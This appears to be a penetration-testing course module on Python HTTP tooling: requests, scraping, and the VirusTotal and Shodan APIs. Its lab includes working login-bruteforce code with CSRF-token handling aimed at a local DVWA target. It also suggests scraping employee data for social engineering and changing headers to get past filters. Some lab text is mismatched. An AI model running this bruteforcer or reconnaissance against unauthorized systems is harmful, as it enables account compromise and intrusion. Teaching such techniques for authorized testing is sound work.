Build web security scanners and reconnaissance tools
Interact with security APIs (VirusTotal, Shodan, URLhaus)
Implement web scraping for OSINT gathering
Automate directory bruteforcing and subdomain enumeration
⚠️ Ethical Boundaries: Web scanning, scraping, and bruteforcing can be illegal if performed without authorization. Only test systems you own, explicitly authorized targets (like DVWA, HackTheBox), or public bug bounty programs. Violating this is a crime under the Computer Fraud and Abuse Act (CFAA) and similar laws globally.
Real-World Context: Tools like Burp Suite, OWASP ZAP, sqlmap, and Nikto all interact with web applications via HTTP. This week gives you the foundation to build custom scanners, automate bug bounty workflows, and integrate with security platforms. Skills align with SANS SEC573 Modules 2-3 (Web Security Automation) and Black Hat Python Chapter 5 (Web Hacking).
Section 1: HTTP Protocol Deep Dive
Understanding HTTP: The Web's Foundation
HTTP (HyperText Transfer Protocol) is a request-response protocol operating at Layer 7 (Application) of the OSI model. Every web interaction—from browsing Google to exploiting XSS—uses HTTP.
HTTP Request Anatomy
When your browser visits https://example.com/login?user=admin, it sends:
#!/usr/bin/env python3
"""
HTTP status codes relevant for security testing
"""
# 2xx Success
STATUS_CODES = {
200: 'OK - Request succeeded',
201: 'Created - Resource created (POST success)',
204: 'No Content - Success but no response body',
# 3xx Redirection
301: 'Moved Permanently - Resource relocated (follow redirect)',
302: 'Found - Temporary redirect',
304: 'Not Modified - Cached version is current',
# 4xx Client Errors (Important for scanning)
400: 'Bad Request - Malformed request (may indicate WAF/filtering)',
401: 'Unauthorized - Authentication required',
403: 'Forbidden - Access denied (resource exists but restricted)',
404: 'Not Found - Resource does not exist',
405: 'Method Not Allowed - HTTP method rejected (e.g., DELETE blocked)',
429: 'Too Many Requests - Rate limiting active',
# 5xx Server Errors (Potential vulnerabilities)
500: 'Internal Server Error - Application crash (SQL errors, exceptions)',
502: 'Bad Gateway - Proxy/gateway error',
503: 'Service Unavailable - Server overloaded/down',
}
# Security insights from status codes:
# - 403 on /admin: Directory exists but requires authentication
# - 404 vs 403: Reveals if resource exists (information disclosure)
# - 500 errors: May leak stack traces, SQL errors (inject payloads to trigger)
# - 401 + 403: Test for authentication vs authorization flaws
Common HTTP Methods
Method
Purpose
Security Testing Use
GET
Retrieve resource
Directory enumeration, XSS in URL params
POST
Submit data (forms, APIs)
SQLi, XSS, authentication bypass
PUT
Upload/replace resource
File upload vulns, unauthorized modifications
DELETE
Remove resource
Authorization bypass, IDOR testing
OPTIONS
Query allowed methods
CORS misconfig, method enumeration
HEAD
Get headers only (no body)
Fast resource existence checks
Section 2: Python's requests Library
Why requests (Not urllib)?
Python's built-in urllib works but is verbose. requests (by Kenneth Reitz) is industry standard for HTTP work.
# Install requests
pip install requests
Basic GET Request
#!/usr/bin/env python3
"""
Simple HTTP GET request with requests library
"""
import requests
def basic_get_request(url: str) -> None:
"""
Perform GET request and display response.
Args:
url: Target URL
"""
try:
# Send GET request
response = requests.get(url, timeout=5)
# Status code
print(f"[*] Status: {response.status_code}")
# Headers (dict)
print(f"[*] Server: {response.headers.get('Server', 'Unknown')}")
print(f"[*] Content-Type: {response.headers.get('Content-Type')}")
# Response body
print(f"\n[*] Response body (first 500 chars):")
print(response.text[:500])
# Or access raw bytes
# print(response.content[:500])
except requests.exceptions.Timeout:
print(f"[!] Request timeout for {url}")
except requests.exceptions.ConnectionError:
print(f"[!] Connection error to {url}")
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
# Usage
if __name__ == '__main__':
basic_get_request('https://httpbin.org/get')
Custom Headers and User-Agents
Many web apps block default Python user-agents. Customize headers to bypass simple filters:
#!/usr/bin/env python3
"""
Custom headers for stealthy requests
"""
import requests
def request_with_custom_headers(url: str) -> None:
"""
Send request with custom headers.
"""
# Custom headers dict
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
response = requests.get(url, headers=headers, timeout=5)
print(f"[*] Status: {response.status_code}")
print(f"[*] Response length: {len(response.content)} bytes")
# Check if our User-Agent was accepted
if 'User-Agent' in response.request.headers:
print(f"[*] User-Agent sent: {response.request.headers['User-Agent']}")
# Common User-Agents for testing
USER_AGENTS = {
'chrome_windows': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
'firefox_linux': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/121.0',
'mobile_ios': 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15',
'googlebot': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'python_default': 'python-requests/2.31.0', # Default (often blocked)
}
if __name__ == '__main__':
request_with_custom_headers('https://httpbin.org/headers')
POST Requests: Form Data and JSON
#!/usr/bin/env python3
"""
POST requests with form data and JSON payloads
"""
import requests
import json
# Example 1: Form data (like HTML form submission)
def post_form_data(url: str, username: str, password: str) -> None:
"""
Submit login form (application/x-www-form-urlencoded).
"""
data = {
'username': username,
'password': password,
'submit': 'Login'
}
response = requests.post(url, data=data, timeout=5)
print(f"[*] Status: {response.status_code}")
print(f"[*] Response:\n{response.text[:500]}")
# Example 2: JSON payload (modern APIs)
def post_json_data(url: str, payload: dict) -> None:
"""
Send JSON data (application/json).
"""
# requests automatically sets Content-Type: application/json
response = requests.post(url, json=payload, timeout=5)
print(f"[*] Status: {response.status_code}")
# Parse JSON response
try:
response_json = response.json()
print(f"[*] JSON Response: {json.dumps(response_json, indent=2)}")
except json.JSONDecodeError:
print(f"[*] Non-JSON response: {response.text[:200]}")
# Example 3: Multipart form data (file uploads)
def post_file_upload(url: str, file_path: str) -> None:
"""
Upload file (multipart/form-data).
"""
with open(file_path, 'rb') as f:
files = {
'file': ('upload.txt', f, 'text/plain')
}
# Additional form fields
data = {
'description': 'Test upload'
}
response = requests.post(url, files=files, data=data, timeout=10)
print(f"[*] Status: {response.status_code}")
print(f"[*] Response: {response.text[:300]}")
if __name__ == '__main__':
# Test form login
post_form_data('https://httpbin.org/post', 'admin', 'password123')
# Test JSON API
payload = {
'action': 'search',
'query': 'vulnerability',
'limit': 10
}
post_json_data('https://httpbin.org/post', payload)
Session Management and Cookies
Sessions persist cookies and connection pooling across requests:
#!/usr/bin/env python3
"""
Session management for authenticated testing
"""
import requests
def session_based_requests() -> None:
"""
Use Session object to maintain cookies across requests.
"""
# Create session
session = requests.Session()
# Set default headers for all requests in this session
session.headers.update({
'User-Agent': 'SecurityScanner/1.0'
})
# Step 1: Login (server sets session cookie)
login_url = 'https://httpbin.org/cookies/set/sessionid/abc123xyz'
response = session.get(login_url)
print(f"[*] Login response: {response.status_code}")
print(f"[*] Cookies set: {session.cookies.get_dict()}")
# Step 2: Access protected resource (session cookie automatically sent)
protected_url = 'https://httpbin.org/cookies'
response = session.get(protected_url)
print(f"\n[*] Protected resource response:")
print(response.text)
# Step 3: Manual cookie manipulation
session.cookies.set('custom_token', 'my_value', domain='httpbin.org')
response = session.get('https://httpbin.org/cookies')
print(f"\n[*] After adding custom cookie:")
print(response.text)
def cookie_extraction_example() -> None:
"""
Extract and analyze cookies from response.
"""
response = requests.get('https://httpbin.org/cookies/set?token=secret123')
# Get all cookies
cookies = response.cookies
print("[*] Cookies received:")
for cookie in cookies:
print(f" - {cookie.name} = {cookie.value}")
print(f" Domain: {cookie.domain}")
print(f" Path: {cookie.path}")
print(f" Secure: {cookie.secure}")
print(f" HttpOnly: {cookie.has_nonstandard_attr('HttpOnly')}")
if __name__ == '__main__':
session_based_requests()
print("\n" + "="*60 + "\n")
cookie_extraction_example()
Handling Redirects and SSL
#!/usr/bin/env python3
"""
Redirect handling and SSL verification
"""
import requests
def handle_redirects(url: str) -> None:
"""
Control redirect behavior.
"""
# Follow redirects (default behavior)
response = requests.get(url, allow_redirects=True)
print(f"[*] Final URL: {response.url}")
print(f"[*] Status: {response.status_code}")
print(f"[*] Redirect history: {[r.status_code for r in response.history]}")
print("\n" + "-"*60 + "\n")
# Don't follow redirects (useful for detecting redirects)
response = requests.get(url, allow_redirects=False)
print(f"[*] Status without following: {response.status_code}")
if 300 <= response.status_code < 400:
redirect_location = response.headers.get('Location')
print(f"[*] Redirects to: {redirect_location}")
def ssl_verification_options(url: str) -> None:
"""
SSL/TLS certificate verification options.
"""
# Verify SSL certificate (default, recommended)
try:
response = requests.get(url, verify=True, timeout=5)
print(f"[✓] SSL verification passed: {response.status_code}")
except requests.exceptions.SSLError as e:
print(f"[!] SSL verification failed: {e}")
# Disable SSL verification (NOT recommended for production)
# Useful for testing self-signed certs in labs
try:
response = requests.get(url, verify=False, timeout=5)
print(f"[*] Request with verify=False: {response.status_code}")
except Exception as e:
print(f"[!] Request failed: {e}")
if __name__ == '__main__':
# Test redirect handling
handle_redirects('http://github.com') # Redirects to https
print("\n" + "="*60 + "\n")
# Test SSL verification
ssl_verification_options('https://self-signed.badssl.com/')
Section 3: Web Scraping with BeautifulSoup
Why Web Scraping for Security?
Web scraping automates OSINT gathering:
Extract subdomains from certificate transparency logs
Scrape public employee data from LinkedIn for social engineering
Parse vulnerability databases (CVE, ExploitDB)
Monitor paste sites for leaked credentials
Collect threat intelligence from security blogs
# Install BeautifulSoup4 and parser
pip install beautifulsoup4 lxml
Basic HTML Parsing
#!/usr/bin/env python3
"""
Basic web scraping with BeautifulSoup
"""
import requests
from bs4 import BeautifulSoup
def scrape_basic_example(url: str) -> None:
"""
Scrape and parse HTML content.
"""
# Fetch page
response = requests.get(url, timeout=10)
if response.status_code != 200:
print(f"[!] Failed to fetch {url}: {response.status_code}")
return
# Parse HTML
soup = BeautifulSoup(response.content, 'lxml')
# Extract title
title = soup.title.string if soup.title else "No title"
print(f"[*] Page Title: {title}")
# Find all links
print(f"\n[*] Links found:")
links = soup.find_all('a', href=True)
for link in links[:10]: # First 10 links
href = link['href']
text = link.get_text(strip=True)
print(f" - {text[:50]}: {href}")
# Find all images
print(f"\n[*] Images found:")
images = soup.find_all('img', src=True)
for img in images[:5]:
src = img['src']
alt = img.get('alt', 'No alt text')
print(f" - {alt}: {src}")
def extract_forms(url: str) -> None:
"""
Extract all forms from a page (useful for testing).
"""
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.content, 'lxml')
forms = soup.find_all('form')
print(f"[*] Found {len(forms)} forms on {url}")
for i, form in enumerate(forms, 1):
print(f"\n[Form {i}]")
print(f" Action: {form.get('action', 'None')}")
print(f" Method: {form.get('method', 'GET').upper()}")
# Extract input fields
inputs = form.find_all('input')
print(f" Input fields:")
for inp in inputs:
name = inp.get('name', 'unnamed')
input_type = inp.get('type', 'text')
value = inp.get('value', '')
print(f" - {name} (type={input_type}, value={value})")
def scrape_security_blog() -> None:
"""
Example: Scrape latest security advisories.
"""
url = 'https://www.exploit-db.com/'
try:
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.content, 'lxml')
# Find exploit titles (example structure, may change)
# This demonstrates technique, actual selectors depend on site
exploits = soup.find_all('a', class_='exploit-link')[:5]
print(f"[*] Recent exploits from ExploitDB:")
for exploit in exploits:
title = exploit.get_text(strip=True)
link = exploit['href']
print(f" - {title}")
print(f" {link}\n")
except Exception as e:
print(f"[!] Scraping failed: {e}")
if __name__ == '__main__':
# Example: Scrape httpbin test page
scrape_basic_example('https://httpbin.org/html')
print("\n" + "="*60 + "\n")
# Extract forms
extract_forms('https://httpbin.org/forms/post')
CSS Selectors for Precise Extraction
#!/usr/bin/env python3
"""
Using CSS selectors for precise data extraction
"""
from bs4 import BeautifulSoup
import requests
def css_selector_examples(url: str) -> None:
"""
Demonstrate CSS selector usage.
"""
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.content, 'lxml')
# Select by ID
element = soup.select_one('#specific-id')
if element:
print(f"[*] Element with ID: {element.get_text(strip=True)}")
# Select by class
elements = soup.select('.class-name')
print(f"[*] Elements with class: {len(elements)}")
# Select by tag and class
divs = soup.select('div.container')
print(f"[*] Div containers: {len(divs)}")
# Select nested elements
links_in_nav = soup.select('nav a')
print(f"[*] Links in navigation: {len(links_in_nav)}")
# Select by attribute
external_links = soup.select('a[target="_blank"]')
print(f"[*] External links: {len(external_links)}")
# Select specific children
first_paragraph = soup.select_one('div.content > p:first-child')
if first_paragraph:
print(f"[*] First paragraph: {first_paragraph.get_text(strip=True)[:100]}")
# Common CSS selectors for security testing
"""
Selector | Matches
----------------------|----------------------------------
#id | Element with id="id"
.class | Elements with class="class"
tag | All elements
tag.class | with class="class"
tag#id | with id="id"
parent > child | Direct child
ancestor descendant | Any descendant
[attribute] | Elements with attribute
[attribute=value] | Specific attribute value
:first-child | First child element
:nth-child(n) | Nth child element
"""
def scrape_table_data(url: str) -> None:
"""
Extract data from HTML tables.
"""
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.content, 'lxml')
# Find all tables
tables = soup.find_all('table')
for i, table in enumerate(tables, 1):
print(f"\n[Table {i}]")
# Extract headers
headers = []
header_row = table.find('thead')
if header_row:
headers = [th.get_text(strip=True) for th in header_row.find_all('th')]
print(f" Headers: {headers}")
# Extract rows
rows = table.find_all('tr')
print(f" Rows: {len(rows)}")
for row in rows[:3]: # First 3 rows
cells = [td.get_text(strip=True) for td in row.find_all('td')]
if cells:
print(f" {cells}")
if __name__ == '__main__':
css_selector_examples('https://example.com')
Handling Dynamic Content
BeautifulSoup only parses static HTML. For JavaScript-rendered content, use Selenium:
#!/usr/bin/env python3
"""
Scraping JavaScript-heavy sites with Selenium
(For when BeautifulSoup can't access dynamic content)
"""
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
def scrape_with_selenium(url: str) -> None:
"""
Use Selenium for JavaScript-rendered pages.
"""
# Setup headless Chrome
chrome_options = Options()
chrome_options.add_argument('--headless') # Run without GUI
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
# Initialize driver
driver = webdriver.Chrome(options=chrome_options)
try:
# Load page
driver.get(url)
# Wait for specific element to load (max 10 seconds)
wait = WebDriverWait(driver, 10)
element = wait.until(
EC.presence_of_element_located((By.CLASS_NAME, 'dynamic-content'))
)
# Extract data
print(f"[*] Page title: {driver.title}")
# Find elements
links = driver.find_elements(By.TAG_NAME, 'a')
print(f"[*] Links found: {len(links)}")
for link in links[:5]:
print(f" - {link.text}: {link.get_attribute('href')}")
# Execute JavaScript
result = driver.execute_script("return document.body.innerHTML;")
print(f"\n[*] Page HTML length: {len(result)} chars")
except Exception as e:
print(f"[!] Selenium error: {e}")
finally:
driver.quit()
# Note: Install selenium and chromedriver:
# pip install selenium
# brew install chromedriver # macOS
# apt install chromium-chromedriver # Linux
Section 4: REST APIs and Security Data Sources
Working with Security APIs
Many security platforms provide APIs for threat intelligence, vulnerability data, and scanning:
VirusTotal: File/URL reputation, malware analysis
Shodan: Internet-connected device search
URLhaus: Malware URL database
AbuseIPDB: IP reputation and abuse reports
Have I Been Pwned: Breach notification
VirusTotal API Example
#!/usr/bin/env python3
"""
VirusTotal API integration for URL/file reputation checks
"""
import requests
import time
import hashlib
class VirusTotalClient:
"""
VirusTotal API client for security checks.
"""
def __init__(self, api_key: str):
"""
Initialize with API key (get free key from virustotal.com).
"""
self.api_key = api_key
self.base_url = 'https://www.virustotal.com/api/v3'
self.headers = {
'x-apikey': self.api_key,
'Accept': 'application/json'
}
def check_url(self, url: str) -> dict:
"""
Check URL reputation.
Returns:
API response dict
"""
# Submit URL for scanning
scan_url = f'{self.base_url}/urls'
data = {'url': url}
response = requests.post(scan_url, headers=self.headers, data=data)
if response.status_code != 200:
return {'error': f'API error: {response.status_code}'}
result = response.json()
# Get scan ID
scan_id = result['data']['id']
# Wait for analysis to complete
print(f"[*] Scanning {url}... (ID: {scan_id})")
time.sleep(15) # VirusTotal needs time to analyze
# Get results
analysis_url = f'{self.base_url}/analyses/{scan_id}'
response = requests.get(analysis_url, headers=self.headers)
if response.status_code == 200:
return response.json()
else:
return {'error': f'Failed to get results: {response.status_code}'}
def check_file_hash(self, file_hash: str) -> dict:
"""
Check file hash (MD5, SHA1, or SHA256).
Returns:
Detection results
"""
url = f'{self.base_url}/files/{file_hash}'
response = requests.get(url, headers=self.headers)
if response.status_code == 200:
return response.json()
elif response.status_code == 404:
return {'error': 'File not found in VirusTotal database'}
else:
return {'error': f'API error: {response.status_code}'}
def parse_results(self, results: dict) -> None:
"""
Parse and display scan results.
"""
if 'error' in results:
print(f"[!] {results['error']}")
return
try:
stats = results['data']['attributes']['stats']
print(f"\n[*] Scan Results:")
print(f" Malicious: {stats.get('malicious', 0)}")
print(f" Suspicious: {stats.get('suspicious', 0)}")
print(f" Harmless: {stats.get('harmless', 0)}")
print(f" Undetected: {stats.get('undetected', 0)}")
# Verdict
if stats.get('malicious', 0) > 0:
print(f"\n[!] WARNING: Detected as malicious by {stats['malicious']} engines!")
else:
print(f"\n[✓] No malicious detections")
except KeyError as e:
print(f"[!] Error parsing results: {e}")
# Usage example
if __name__ == '__main__':
# Get your free API key from: https://www.virustotal.com/gui/join-us
API_KEY = 'YOUR_API_KEY_HERE'
vt = VirusTotalClient(API_KEY)
# Check suspicious URL
# results = vt.check_url('http://malware-traffic-analysis.net')
# vt.parse_results(results)
# Check file hash
# malware_hash = 'd41d8cd98f00b204e9800998ecf8427e' # Example MD5
# results = vt.check_file_hash(malware_hash)
# vt.parse_results(results)
print("[!] Set API_KEY to use this example")
Shodan API Example
#!/usr/bin/env python3
"""
Shodan API for internet-connected device reconnaissance
"""
import requests
class ShodanClient:
"""
Shodan API client for device search.
"""
def __init__(self, api_key: str):
"""
Initialize with Shodan API key (get from shodan.io).
"""
self.api_key = api_key
self.base_url = 'https://api.shodan.io'
def search(self, query: str, limit: int = 10) -> dict:
"""
Search Shodan for devices matching query.
Args:
query: Search query (e.g., 'apache', 'port:22', 'country:US')
limit: Max results to return
Returns:
Search results dict
"""
url = f'{self.base_url}/shodan/host/search'
params = {
'key': self.api_key,
'query': query,
'limit': limit
}
try:
response = requests.get(url, params=params, timeout=10)
if response.status_code == 200:
return response.json()
else:
return {'error': f'API error: {response.status_code}'}
except requests.exceptions.RequestException as e:
return {'error': f'Request failed: {e}'}
def get_host_info(self, ip: str) -> dict:
"""
Get detailed information about an IP address.
Args:
ip: Target IP address
Returns:
Host information dict
"""
url = f'{self.base_url}/shodan/host/{ip}'
params = {'key': self.api_key}
try:
response = requests.get(url, params=params, timeout=10)
if response.status_code == 200:
return response.json()
else:
return {'error': f'API error: {response.status_code}'}
except requests.exceptions.RequestException as e:
return {'error': f'Request failed: {e}'}
def parse_search_results(self, results: dict) -> None:
"""
Parse and display Shodan search results.
"""
if 'error' in results:
print(f"[!] {results['error']}")
return
matches = results.get('matches', [])
total = results.get('total', 0)
print(f"[*] Total results: {total}")
print(f"[*] Showing: {len(matches)}\n")
for i, match in enumerate(matches, 1):
ip = match.get('ip_str', 'Unknown')
port = match.get('port', 0)
org = match.get('org', 'Unknown')
location = match.get('location', {})
country = location.get('country_name', 'Unknown')
print(f"[{i}] {ip}:{port}")
print(f" Organization: {org}")
print(f" Location: {country}")
# Display banner (first 200 chars)
banner = match.get('data', '')
if banner:
print(f" Banner: {banner[:200]}")
print()
# Usage
if __name__ == '__main__':
API_KEY = 'YOUR_SHODAN_API_KEY'
shodan = ShodanClient(API_KEY)
# Search for Apache servers
# results = shodan.search('apache', limit=5)
# shodan.parse_search_results(results)
# Get info about specific IP
# info = shodan.get_host_info('8.8.8.8')
# print(info)
print("[!] Set API_KEY to use this example")
Lab 6: HTTP Security Tools
⚠️ Authorization Required: Only test against systems you own, authorized targets (DVWA, HackTheBox), or public bug bounty programs with explicit permission. Unauthorized scanning is illegal.
⏱️ 135 minutes totalDifficulty: Intermediate
Part 1: Directory Bruteforcer (35 minutes)
Objective: Build a tool to discover hidden directories and files on web servers.
Requirements:
Create dirbrute.py that:
Accepts target URL and wordlist file as arguments
Tests each word as a directory/file path
Identifies valid paths (200, 301, 302, 403 status codes)
⚠️ CRITICAL: Only test on systems you own or have explicit written permission to test.
Success Criteria:
Successfully logs in with correct credentials from wordlist
Handles CSRF token extraction and submission
Rate limiting prevents account lockout
Detects login success based on response analysis
Hint: Form Parsing and CSRF Handling
from bs4 import BeautifulSoup
import requests
def extract_form_fields(url: str, form_id: str = None) -> dict:
"""
Extract form fields from login page.
"""
session = requests.Session()
response = session.get(url)
soup = BeautifulSoup(response.content, 'lxml')
# Find login form
if form_id:
form = soup.find('form', id=form_id)
else:
form = soup.find('form') # First form
if not form:
return None
fields = {}
# Extract all input fields
for input_tag in form.find_all('input'):
name = input_tag.get('name')
value = input_tag.get('value', '')
input_type = input_tag.get('type', 'text')
if name:
fields[name] = value
return {
'session': session,
'action': form.get('action'),
'method': form.get('method', 'post').upper(),
'fields': fields
}
def bruteforce_login(url: str, username: str, passwords: list) -> None:
"""
Bruteforce login form.
"""
# Get form structure
form_data = extract_form_fields(url)
if not form_data:
print("[!] Could not find login form")
return
session = form_data['session']
fields = form_data['fields']
action = form_data['action']
# Determine username and password field names
# (Usually 'username'/'user' and 'password'/'pass')
username_field = None
password_field = None
for field_name in fields.keys():
if 'user' in field_name.lower():
username_field = field_name
elif 'pass' in field_name.lower():
password_field = field_name
if not username_field or not password_field:
print("[!] Could not identify username/password fields")
print(f"[*] Available fields: {list(fields.keys())}")
return
print(f"[*] Username field: {username_field}")
print(f"[*] Password field: {password_field}")
print(f"[*] Testing {len(passwords)} passwords...\n")
# Build full action URL
if action.startswith('http'):
submit_url = action
elif action.startswith('/'):
from urllib.parse import urlparse
parsed = urlparse(url)
submit_url = f"{parsed.scheme}://{parsed.netloc}{action}"
else:
submit_url = url
# Try each password
for password in passwords:
# Update password field
fields[username_field] = username
fields[password_field] = password
# Re-extract CSRF token if needed
response = session.get(url)
soup = BeautifulSoup(response.content, 'lxml')
csrf_input = soup.find('input', {'name': 'csrf_token'})
if csrf_input:
fields['csrf_token'] = csrf_input.get('value')
# Submit form
try:
response = session.post(submit_url, data=fields, timeout=10)
# Check for successful login
# (Customize based on application behavior)
if response.status_code == 302: # Redirect
print(f"[✓] SUCCESS! Password: {password}")
print(f"[*] Redirect to: {response.headers.get('Location')}")
break
elif 'welcome' in response.text.lower() or 'dashboard' in response.text.lower():
print(f"[✓] SUCCESS! Password: {password}")
break
elif 'incorrect' in response.text.lower() or 'invalid' in response.text.lower():
print(f"[-] Failed: {password}")
else:
print(f"[?] Unknown response for: {password} (status: {response.status_code})")
# Rate limiting
time.sleep(0.5) # 500ms between attempts
except Exception as e:
print(f"[!] Error with password '{password}': {e}")
# Usage
passwords = ['password', '123456', 'admin', 'letmein', 'welcome']
bruteforce_login('http://localhost/dvwa/login.php', 'admin', passwords)
🎯 Lab Complete! You've built professional web security testing tools. These techniques are used daily by penetration testers, bug bounty hunters, and security researchers. Always remember: authorization is required before testing any system you don't own.